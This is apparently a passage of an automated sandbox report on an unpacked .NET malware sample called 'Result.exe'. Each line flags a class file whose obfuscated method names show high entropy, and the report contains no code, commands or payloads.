Source: 1.3.Result.exe.2642c39.0.raw.unpack, xWhDIfGh8PApjqkB3ox.cs	High entropy of concatenated method names: 'Ik2tedcZ04', 'Om3ApNxsKqbW3n51uul', 'zdQZgoxBJFAGuUsfbH8', 'NG2iqBxmykD2tUFp9QB', 'avWtdSxyyegeVgngFdY', '_1fi', 'vX7SoIoDFB', '_676', 'IG9', 'mdP'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, z2U5t67BwbnoCjPv4Xh.cs	High entropy of concatenated method names: '_7zt', 'ul0Lbsx9jl', 'uBWLOCSa2v', 'wvvLdoHtGD', 'tCDLNJT1D0', 'ljELcmUEcg', 'pmdLEcOYDb', 'y7k8cLVrPEIuYX3PGjU', 'sdWW35VLZ4kEC7IsFUC', 'la9BpTV93MMxWANCjIr'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, LNcjaT7FXIwmyJicO5F.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, x1G6pPDFtsh863ctT4.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'yqpQNVwx5g8fPmLxMCe', 'RhEWc7wgLklpOhO4MWA', 'qPaFTnw4Pa51WPWJeNe', 'qPVxQowZALaoCFqIoGH', 'R7kOyAwNFpCL1y1lM6L', 'n2PpPYweQZBQ1uhDVeB'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, YbgphxG5g9Jw5XMqvfv.cs	High entropy of concatenated method names: 'Ieg1cRKl0u', '_1kO', '_9v4', '_294', 'B3E1EoZqlq', 'euj', 'WoR1qHBuiF', 'Ly31VcWfEE', 'o87', 'BMo1kEXC9F'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, LA0jeR7ctquxODXu7MJ.cs	High entropy of concatenated method names: 'xeQ7kMVgaWIN9T1cJBo', 'fRvpU0V4ivCGHqAqpL9', 'iuwbFgVZEK2aHwLGsGf', 'meCvnIVEB3HujW43LW7', 'cCZZuYVxrMQSjtJSank'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, zsa8dOGEncbuD7NjZD3.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'fU7kqHZXS8', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, vfjP2WstDoN9mO43WJ.cs	High entropy of concatenated method names: 'TP2yWtDoN', 'IkxFySth9nD3whLt97', 'PBl4e1BjKXOigQKa02', 'CS0eFKTlJVOsvec85V', 'Uq6nQlG74RHq6By2xe', 'IQuS2JCnJ7NsHFCat7', 'usSaTkVf2', 'QblJnL1ll', 'NWk769qq6', 'Xp4RZ0tii'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, KtgOgEaZxpZ7Xqg6q3Q.cs	High entropy of concatenated method names: 'Bx1JTvsBI3', 'axWJXM5GUp', 'HqOJQDuXeF', 'NatJpQXDBx', 'U7fJhZuoVp', 'j1FJeTfc2c', 'tHLJfWMGkX', 'rCnSXJkHRmil7MaF6wq', 'zDe4lOkryOOR7oWTUJh', 'PTXpl7kLDJsChlQml37'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, RtainsGW4fxAhFbG8mU.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'Jo19VKUunB', 'QpH9ke6yvx', 'ikD99iHbbt', 'd7Q9SGmiwK', 'StI9tbeh23', 'AGR91hbTCp', 'BtuFXpE3Sj6CGHhFk7A'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, mv5PHLacBSFYVLFlVtf.cs	High entropy of concatenated method names: 'a8J7ddANZF', 'z5K7NLqrcy', 'HrT7c5HjGV', 'Ur67EVZIcl', 'Mqr7q6ry60', 'a09Zc1jlQ5Fkp1Jt3el', 'lrMuNTjptBcusK9YmRb', 'a19V3F1dDI181KJgMCW', 'nA0ijV1z9b9hdKZEkE0', 'j75MhLj56UkFDk6RXal'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, NrTABiMLvMcu3Am0Ss.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'dT129dW8EocRGopwult', 'ds5s1cWSaUEsRvsxJAP', 'X88anOWabYXJV5SBjK7', 'LtZ54PWJO2n0NfYEIVc', 'VAhsliWoaN0XlikE5dw', 'toJ22wWdYbwahnCG4EI'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, OTnvIa7ZABiAU1abijT.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, JUVOIm7RlYOijLikpvR.cs	High entropy of concatenated method names: 'TteKxUdyOO', 'wZtunFcUkQJOoOFbOYk', 'Qq4QUXcnuMXKffT3Pq2', 'hQrsg7cMlG5o9pwAnJS', 'pDDTJmcqtZoQvqkdDFY', 'VlLCimatXa', 'ficCWjMZEv', 'abWCTCW0oa', 'KOnCX3ghAF', 'gNiCQbsCLB'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, J7G5cQGNO049YArLSx8.cs	High entropy of concatenated method names: 'qkZkO5X4QS', 'cfokdOAgOt', 'AUnkN3lcV1', 'XHYkcasMv4', 't63kEQ6qTp', 'duxUXM0JtyRW44EHpj6', 'zkcGv50oXgjgonrWr4A', 'hIpwoC0dHeSqWb3IpLP', 'E9DurO0z2kngWE0GhYd', 'rMUvxZYlTUnbwSGXEju'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, lGIwbmGXEyGlkwZ4fNQ.cs	High entropy of concatenated method names: 'aqdCpExwqlDruXWT4i3', 'eKr7uvxWiTm6lFgTDoQ', 'JcBmFfx5AZZhF9Ko9MP', 'BwQmvjxAYuUn8HKa1ON', 'MoK9QKmwKx', 'WM4', '_499', 'BOH9poeXOq', 'Iym9hiLCcv', 'RtJ9eKVVOO'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, iKm6ibax7bVYVLsjWVD.cs	High entropy of concatenated method names: 'XLIJMD1G6D', 'IOIJnFdR0N', 'x2mFLS6ngyVfnx4wnmo', 'apgX0X6vKIJjsKhByhu', 'lOTYtt69eM0bw65xiUP', 'BRLpgR678bDO6RULWRK', 'MHYM5K6rAsdQOZY9ynr', 'KRQ0Jw6Ltb1Qs3kAX6r', 'B26FY96HbCfng2OA2lV', 'GuSCG66cW36wS9o8Wm9'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, s703IyRjy6OOtM6MNFo.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, p8kJJFJoqqCLtyZGyuA.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'rhvCFbsPN8', 'LRfTlF7s2H', 'oDrCKnMnTr', 'OKGTA7S6tn', 'JUVsSRLKMCdAoDZ2E8s', 'EyCMYfLR4EWgf5dnOB1', 'jvuEKULfnZ3jlps75ku'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, vLS2q9Rno100QGIcjAB.cs	High entropy of concatenated method names: 'vpJVSYBDqc', 'RkKVtWD1xv', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'TAbV10ABwK', '_5f9', 'A6Y'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, kcYm2yAxiu8duiBOo3.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'FR0EvjwOfJt4LTiakre', 'trY9aiwPykcg5DAFO82', 'aEdEWIwhuyrMDphvTFD', 'lFRhOrwkhvvttQcL7Yy', 'ztPYSUw6cZGNpjoRteG', 'cBtVTVw1OaVOiZGZk4C'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, MywuO0ecBIEDWkejmN.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'V2Ih4YAf3GPHWR9W79M', 'ljZu5fA3nWpx3iyxV8J', 'DMr8OVAKtOxE8KgVOD0', 'sHVIOhARgHOatl6Xv9h', 'EnpilrA0k7U6PHZqmoR', 'LylQ69AYdVrdeVf4J0C'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, rHt7uMJCfWa9UHePPBG.cs	High entropy of concatenated method names: 'RSXmXJTWCT', 'zeFmQ34xTc', 'MyDmpVtx3v', 'r2gMmd96TEsbkAmpEtR', 'V3oX6i9hoRq5vFZsXjC', 'a45LGk9kmUhfG56fb54', 'hB3FLF912jKHsxyg6mD', 'Qnmm2DFJ85', 'dEAmrLVT13', 'McPmxMbPGD'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, WcHawNutdttSSVMdLiu.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'DtiAUybfglg1rI2lxEa', 'avXXLob3sThGvOOyXf4', 'C1m3xcbKqALkaHyr02u', 'jpwmGGbR9ECWEfRt32G', 'aKv6Y0b0Kilh7vaPRK4', 'IuTffrbYIPYwLOMscqB'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, BHb0VlGaagfBmK20jUO.cs	High entropy of concatenated method names: 'mD7kmaKj58', 'NmjkZxMgLf', '_8r1', 'tiukCDPQXf', 'W1UkFOj7TG', 'RVqkKMqLTC', 'd8hkL9vqb7', 'Vc6FlX0jVgtAkSOeLJT', 'HgVEV20MX3Nxi60O2Bh', 'H1VpXo0qw8TKhVfW4rN'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, ef7UDCGv7gcEUFZT1op.cs	High entropy of concatenated method names: 'EARV3OyIYC', 'IJ4VDKoCx0', 'cErVHCNGBZ', 'ryDVgQK08h', 'jKMV5L5PGV', 'QSjVoAYUOg', '_838', 'vVb', 'g24', '_9oL'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, J0Qd22uZbby0hcTU85o.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'Xidlv6iidhPmlAyN6mU', 'P1MOZ3iDaU5ef7Qi494', 'iyDh2sib7THfe0NTKKi', 'iieZ9TiXe0IshoiWiKl', 'Gu5whiiOm1tcQKZUTUD', 'EJZ8qAiPL34sircwnja'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, sy9nlb4UjJR8gEsPiC.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'SnrNErAa8fQm6iVuCUe', 'x3n3fyAJQOPS2UyJ1IQ', 'X5LNUIAoCJXTKSaAQPf', 'Fl15a5Ad56UhGBpceEY', 'N4X4CQAzFKbU1tSoY4E', 'zZxSjAwlfybt4YBjRqe'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, PCKnhaJqFcgQEqef9I7.cs	High entropy of concatenated method names: 'eZxZTAVhBN', 'bgRZXOj5Lk', 'MLgB0orUAfjlrdID2Mf', 'ODSMvZrnbieKPa5hUl8', 'jGJLCXrMgRXEtqROiY8', 'Qgo283rq7Gcv69poj2C', 'HB7NCUrv7VYfosJupxK', 'MQxgV4r9t3tTeOMiUSb'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, ff8RppJuiGtFdXf28Cx.cs	High entropy of concatenated method names: 'JMCs1VcsXA', 'MDgsiJs4mA', 'aDosW7ZouH', 'LwGsTlkUSf', 'Xn6m2PUzvQZLX401N9M', 'pPx5wAUoAimPpCO1kdd', 'avJg16UdShgaOOJWU3U', 'rYB7MPnl7cfsJHyUDjb', 'ooIaLvnp4NZOCJmUqeY', 'QrWe5gn5UFReTyqZnw8'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, W6hetLuEAbhKOOpdNis.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'buRvaHDC5cd0felcx4t', 'o8YwRSDf7jevKmnUEwc', 'FvsMmpD3QUVkA3xr8Ky', 'egw2GGDKy6Oj4vbPwuw', 'AIQv3MDRTgeeY3ZNs0p', 'vm94hdD0VJ3bic8oQUU'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, jgeZRtuuWoVL5c6k13I.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'xbtWNw2n63NZBbWOgis', 'hhFgC12vm7GucRlqyyH', 'YJsHUW29nc5NZKpNXYv', 'bNLUD027x1aE4iaY9V1', 'sjpANu2reLArjoGryl0', 'ARyCkh2LS1RjHRC33oQ'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, yeQlmn7qaACEmCIw5Xr.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'lGIyvwbmEy', '_3il', 'flkyuwZ4fN', 'Gkyyan4Bhe', '_78N', 'z3K'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, rkWbSxue3YUmlTIaIta.cs	High entropy of concatenated method names: 'XTsuM98IqV', 'VQW7J7X3nhI2cAr652f', 'SALUVSXKecWK7N0HLJ4', 'thImEjXCX7Ffj9dfJTE', 'IcBLirXfbEXoL4ySiS5', 'vphbTyXRAnH5rDaffAd', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, fNCQZKGtx1VHEenG35h.cs	High entropy of concatenated method names: 'rmP9Z5MjGy', 'FG19CsQjJU', 'M3J9FZWAgt', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'XXw9KXv23w'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, QqtijouQ8IvvqFJ7LPx.cs	High entropy of concatenated method names: 'zqDuY7cqcN', 'nOhLjxXHBRMer6h1jM9', 'dG2oOJXcKWfXJj8yJoW', 'pRMZAUXroBKUMimmbXR', 'mluELyXL3uLZKoNBlJd', 'NBVK9aXVkrWWn09F27b', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, g5HUDyJUtfPsndj7DmN.cs	High entropy of concatenated method names: '_5u9', 'GCUT5S27ul', 'slwCvbAhGb', 'xyGToDs18J', 'aIk0jhrJbsXMP929EpM', 'cOwcgIroEegYLaBH46t', 'vflGPerd6yffLg731Vh', 'D76O4NrSbeg0WJcChrG', 'qvTWxGragFZbF3yKLNK', 'RHS7ArrzcEbRisiabRq'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, Ye9RruubYRRcCcTsZXs.cs	High entropy of concatenated method names: 'nyxu1iu8du', 'SmHkmyDqYHf11oxfhsN', 'pNP058DUCaVLqCccnDL', 'pH6n8MDj3TJdIFbk0XK', 'aQ6UQdDMMqng1fFcVcL', 'VwiSnZDnuJdNNN7YZYx', 'PXblMlDvQTUueTjmySd', 'mAj8BsD9S7S90jpwpuY', 'JDC3iBD73XBdPXO6LFs', 'f28'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, pvDVj975CFnUK40X4EC.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'eP5w2DasP1', 'RM5wrDnPV5', 'r8j', 'LS1', '_55S'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, JelU0LJLqUaCCMtuWxf.cs	High entropy of concatenated method names: '_223', 'CtHC3E9qtlvnlt2iFpS', 'gPvN3u9UMJDR8N8jnn6', 'uoDScJ9nFsYYDb0ZGb7', 'XkiVS59vFrKDGHWhT1c', 'nvw3Fi99L0jExOV614b', 'YRusbv97vHCQrBCENNb', 'dKacc69rICMeHB7HKci', 'IXyA5Y9LyuYEyjkCrmj', 'Ek844t9Hjrf9fJxn5xN'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, V9BBYX7xLOuqhxXjTMf.cs	High entropy of concatenated method names: 'J5NL70skTh', 'yunLRlgP9Z', 'sQOLGatoOC', 'm1XGY8VMf1eO59JjFtI', 'Jv22w7VqeMiqPH3oRgj', 'sHd4hNV1GaRmV073Cyk', 'NtrSHoVjHaqe2k1nD3N', 'iF2uPkVUs8cfpfoIuk9', 'v33IgYVnqGZj3o9mTbc', 'PQxlJRVvmFNPjC7xxqN'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, qjbesxY1j409qD7cqc.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'I65A8jWmRkI6ynCHL9V', 'bTOgHiWy2YYW3MPYtia', 'qPFyyRWsGKygSJTY35u', 'GsUYAiWBij1JbPSU0JP', 'pbrd6NWTDhXPRuU5aap', 'T6ToYwWtrB4KUifCH9e'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, iFEE2ManVTRtGTQFLd9.cs	High entropy of concatenated method names: 'CXwsVGJsVf', 'NwZ56WUFooG1JYmHA9r', 'YVNlLnUNAZbZ5kZkmFp', 'D6FSKBUeYNvMUk9JdiX', 't9JXbqUQ7tY8iUp61Hm', 'Obi3wWUIM14I81IywGF', 'gRPsBqabyL', 'hSVsbcCKU0', 'uZHsOrEcwX', 'InssdjU29T'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, SeYd2MuV7CCa9rOcfCT.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'xT9G98DZxlWrjMy07sE', 'ilCYtWDNXCA10SPVN12', 'VcjOEKDeu2CxhAfSxiI', 'EjAor4DFywv8Zp90pSm', 'HJK0YwDQGvRoftKap0g', 'eO7OwFDIy7po0ujoLBC'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, be01wYScfko2Rk8q3l.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'dn5j9Z5OL2Sdoxb29eG', 'FRlCZa5P8FORWG1F2ZN', 'gUdP2T5hxHZPWEkrURQ', 'RkA4qu5kNVSvum35ntr', 'akWy6G56Hn7ZWTsqO38', 'B4KkjM51Irbrd5vNpLj'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, fQYTMjaBdYZKqrutVJF.cs	High entropy of concatenated method names: 'qIWJzvgxRp', 'T267vnVu17', 'GPv7unbpQK', 'rgv7ayy6mO', 'WeG7Jv1TDL', 'tBy773e1lu', 'EcI7RIEpD1', 'dMb7GOFXeQ', 'SO07s2xyW4', 'rJM7m2vaeG'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, zsdR2DsFJ035Ao7P5Da.cs	High entropy of concatenated method names: 'Irj2YoGG1ABcf', 'h9a1ME41RCgl8HVVYfN', 'w9E8Xm4jA2xDmlOvE8o', 'eXkUiG4M20HP6mTIWRS', 'JCoRhf4qMJTZkKdTLAp', 'BHN2vZ4UKuAcF1BfJGc', 'Tp2os64kf6rrydLnhY7', 'JHUGiF46E00wbsLgwg8', 'qLZsSd4n90c3EyMAsxa', 'Hb2fcY4v5oP98U9RdQY'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, h0e0dTuwSbBJCD0PUZO.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'DQELgMiRZP1h5rZafOp', 'UFraYLi04yLNuETIrmW', 'qmImQtiY651ubENiEVk', 'Ht24gciEkYlr9jHhDSQ', 'lSFp8RixSTjnUvcwFs2', 'xDM4r3igZCs9Gc648Dy'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, xMtRJJpXLsZYYflx4d.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'HXMVWw5oLo29rhMlhEP', 'T72DWs5dtAEkFfBqhDv', 'Hfh6lQ5zkaYClVOpwO7', 'TvSPO0AlCMRrgRJxEr6', 'vu6NR2ApNxZK6yhZ8gS', 'qhNHTAA56dVOmIiu5Ft'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, QF29v6a4Ju3gjTbU5wG.cs	High entropy of concatenated method names: 'wD8GmT7dqr', 'B84GZlZS3q', 'JnJNLZqS16LV3XPAWhY', 'XvHUmGqaqZ70OAoHunB', 'HvonmZqIPCvVJhwmID7', 'DIhJSbq8jrnO37bjej8', 'jEEGx2MVTR', 'eskNQNUlAa71REKdOdH', 'y28MVNUptH9DKPR8Jns', 'lf2scoqdRiiTUKLJQ2R'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, gIKnYfuRbL7BNFAgQ76.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'wFpNyH24P2EcfcTYJrq', 'AVaY7I2Z7kQ0LbMKA1o', 'vA9duC2N6piicgI2lyq', 'jr6o1W2eFTQgH2CoKu6', 'xHeaEc2Fyypsl2BFXbB', 'nLIGZm2QYW8SCPO0QoK'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, rGms3uRZTegQ4MAAamE.cs	High entropy of concatenated method names: 'O5rqO4VmHX', 'S8cqd8PcXa', 'crr9Haf8WPI0DRyfyJZ', 'nic3CnfSwnp3FfrWmbd', 'oL5wlYfaRayyGm5rXFy', 'Rr8VSZfJGTTGucnafSy', 'wQVF5nfovErb2ZvMImQ', 'ijMgGMfdeqDAVh4phq0', 'kCNuemfz1FPSgMD1biq', 'nkyoRE3l53IghdG1mTj'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, BHyiaOus0I7Q9OIpcCc.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'Bj3tWo2SNmKIKAJnNn1', 'IyFQch2aNjgAc4s9fAu', 'VaQB762JnrK1CX8AW2g', 'PhLsyA2ojscujBZxA7Q', 'B4FRUN2d4IR5PxbNIBO', 'dUY9C12znYtErIDY9od'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, k0l47gRlvEaTDhPwYss.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'oNmVE8h8Qa', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, qu6W1eRigMsiCkrjasr.cs	High entropy of concatenated method names: 'OKGqH0d9eV', 'YWfqgYLxIZ', 'mApq5yEa6e', 'eL3rBX3014LMLEb8D2Y', 'TX34XO3KJVkAEQL7Qn8', 'Rl87Ua3Rq28DMYKEc5R', 'zIFCD23YEAlQuKKK6pG', 'MPkKN23ECqPlRbwwkpk', 'd57GBS3xHcg6HDGDEEp', 'By76403gUW1tvaetekf'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, Fc9DOUJgPccVdqBHYLP.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'A5XTIxckOd', '_168', 'KRic0xLcWMWwBQS87mY', 'Y8ZZLMLViIlIV2fIPKd', 'katGwPLuGIjRjUgdB71', 'lOUscfLmAygk1tnat9L', 'Oo6Jq0LyaTgt1Cw8PPX'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, AgDQU5atSwIhrkALSBE.cs	High entropy of concatenated method names: 'JYf7MRZgmU', 'dey7naUFYM', 'TLc7zZoqPi', 'LPIRvdHfWa', 'HrJRu1DEuM', 'T9IRa02eG6', 'fYbRJ7cH72', 'RpZR7iZO6l', 'wl0RR3wv5P', 'FGBYU3jSfo2LCfGa0iv'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, rfPsabav2UvM2QpUgbr.cs	High entropy of concatenated method names: 'v3taV2MiJG', 'rPxakjVS7w', 'shQa9ncd9M', 'peWxFtPtu1Om1DsLytd', 'WSwGH5PG4Sdu3YBXxOV', 'S8PIfLPChnykyEWixiY', 'B8HDCgPf0NUlhEoowSw', 'MRhor3P3I8XGh9AURXq', 'yJAyLJPKyuvjP9dUV7S', 'gZtiVwPBwqBlp9umXHV'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, OG5ESOaaTs3F9FrbVPp.cs	High entropy of concatenated method names: 'GSbaHySp91', 'xqnage9Rru', 'URRa5cCcTs', 'iXsaow74yF', 'BnvajrDeai', 'F8vaY6WRq9', 'OqtvqXhqDGqsePMjSpf', 'LgeMxMhUi1DfySlntWT', 'h2Nck4hjGUgtJv6hWKY', 'Ucp5YHhMUURK9VMFUbp'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, zeNdTUuiBECNmWNZRAb.cs	High entropy of concatenated method names: 'RKHu3cRYZ1', 'yAaRD7X52e1lYeTMZT7', 'i4n6VkXAF3EGsWP9WU8', 'ThpmdJXlkV9v99DgKnU', 'n5kCUhXpgKlptUjxEw8', 'tEM3q2XwU702WvFkOdx', 'y05xi9XWIB36lkkM47P', 'XZWQ9vX2k8Zx6e9vVjJ', 'ekTuHoht6A', 'hgbGExXbcDQSpeqmh6a'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, lSKh7M7Yw7JMD8IphkJ.cs	High entropy of concatenated method names: 'lDcwMDk6eT', 'rjkwQ9Ipeq', 'fvhwpLatKT', 'HVWwhVgQBm', 'FRXweL4xIp', 'MaHwfyMota', 'l78w4dc4ug', 'G2Ew0rsJYL', 'HOewAWMS8E', 'zRQwIO6Hwx'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, MAYJ2eU6oA2amU8rYv.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'PKlhvEwqKW06ibrpFUW', 'M63riWwU10OQGCBMB96', 'mpcrKPwnuTDwjX3fyHG', 'FivCh2wvcYs68Jn7nsd', 'EQYLQjw9qfH8pgD2lH0', 'jic24Zw7RwhYvePusnJ'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, qUfW8WkSB35WUnZFJH.cs	High entropy of concatenated method names: 'GOuQpMLkO', 'C0tpGo4DQ', 'ntWhFmoOA', 'YBlXNjpKiyCATqcjnJm', 'Ge8liYpfw7QuAD1342n', 'SHdplkp35wghJlxIQBo', 'JA5AD4pR39KxqsHpURu', 'wyN2ADp07f7rr1kIXC1', 'UC37HYpYvdOKIKS9YBd', 'd0b7KkpE5fE4E126Lsm'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, TpGEhH7d8LWqFHfeSfF.cs	High entropy of concatenated method names: 'endLX160hL', 'WXILQnb9sa', 'qdOLpncbuD', 'dNjLhZD3sk', 'm1uLeiUO88', 'o88oQqVCwCqoOMvBtWq', 'tWIrsBVfeZ10wWd55eB', 'eMWPHQVtqVmmCRl878F', 'w8QprQVGSCiydEayxdE', 'gWw1TCV3DqOY4oB8nCI'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, PLOBy3u6e1luTcIIEpD.cs	High entropy of concatenated method names: 'YhbabK1Hyi', 'MDixgCP2ZOD6TRZhcq9', 'Im3SjEPiNwWnjJ6rwUE', 'w8sYeOPwqreCJEdTVIl', 'XeI5mYPWKhXq2wql7SC', 'CapQ5MPDyaqGHXRPdBi', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, yplOpsGGuyVdpAnPxjB.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, Wvy3HBuDaueiK0aNGAg.cs	High entropy of concatenated method names: 'RBEaFO9vPJ', 'ObMaK2W76O', 'i1ChF4OPsXFuI4ce95X', 'M3JSWxOXe6nQtougj5W', 'iliuvoOOt4vhFjOBJuP', 'yuh2j3Oh9va38Pkk0qK', 'kAXKTqOkIsfUWa1W26m', 'x6utBAO61Ab8CeDxYRJ', 'YgqQInO1pDQX2c7XPrS', 'qbtsD6Oj12xmSwsKKxn'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, wMvJA3RTuye10p4ltvx.cs	High entropy of concatenated method names: 'PP8qjYoArO', 'gntqYpsejB', 'BX3qPtXdWs', 'b6iq6tlBhB', 'pT6qlPWot9', 'T1jqMcsQLA', 'qlaILG3NB4XiUCwabvT', 'VrrUf534Z9TmLv7IcPR', 'aCTplM3Zehv8HYfBOhR', 'cAWrDD3eDZiPL5Is0y9'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, hAcWYnugAdD8NNEUSM9.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'GsTy9DO9qkRTqHU2ppc', 'GTtUhrO7ylh71Pmvi2I', 'rTlKk6OrHVRJO56dfy4', 'pKbC3aOLscZr3aOktxX', 'FLIEUkOHk3iuuTJMAxU', 'BYlJMtOcXlpQ8WA4W6Y'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, shQncduF9MH0lrnsZqc.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'f0U4QEin2DEelIaG1PO', 'TeaRv3ivoeq99ljPtDl', 'yHnScri9AlEYduRoZBG', 'GRoPjgi7GF2yThorceR', 'suLBv6irb4HoAmfgUHr', 'jBxGlViLJdmgMPx0Keg'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, tSt0FE76Wd0fFuqvEWB.cs	High entropy of concatenated method names: 'hs42VsawFe', 'xYq29gx12X', 'ApP2yTd19T', 'LMN2wcYO5C', 'qZs22tmhJJ', 'Glx2rvLRAi', 'hNn2xk8pkr', 'oT428flInC', 'K7q2BhtFWr', 'f2d2bIxfc4'
Source: 1.3.Result.exe.2642c39.0.raw.unpack, ycwsREJzIPIANDdraYC.cs	High entropy of concatenated method names: 'AmUCSeDMGK', 'sPnCt0xXYw', 'PshC1ftqCU', 'yFuoPUHYHnfZaBLHLw1', 'vA8JxbHE9RP0XAtjA37', 'Nj2oq7HR7sJlSGdcEHS', 'fYx3NPH0Z0h47EjSw21', 'j1NXdmHxgMaOMnr59uG', 'hAHPRmHg7sqV0eoQ0nI', 'Ppg5QFH4LTp4A1bwtRm'
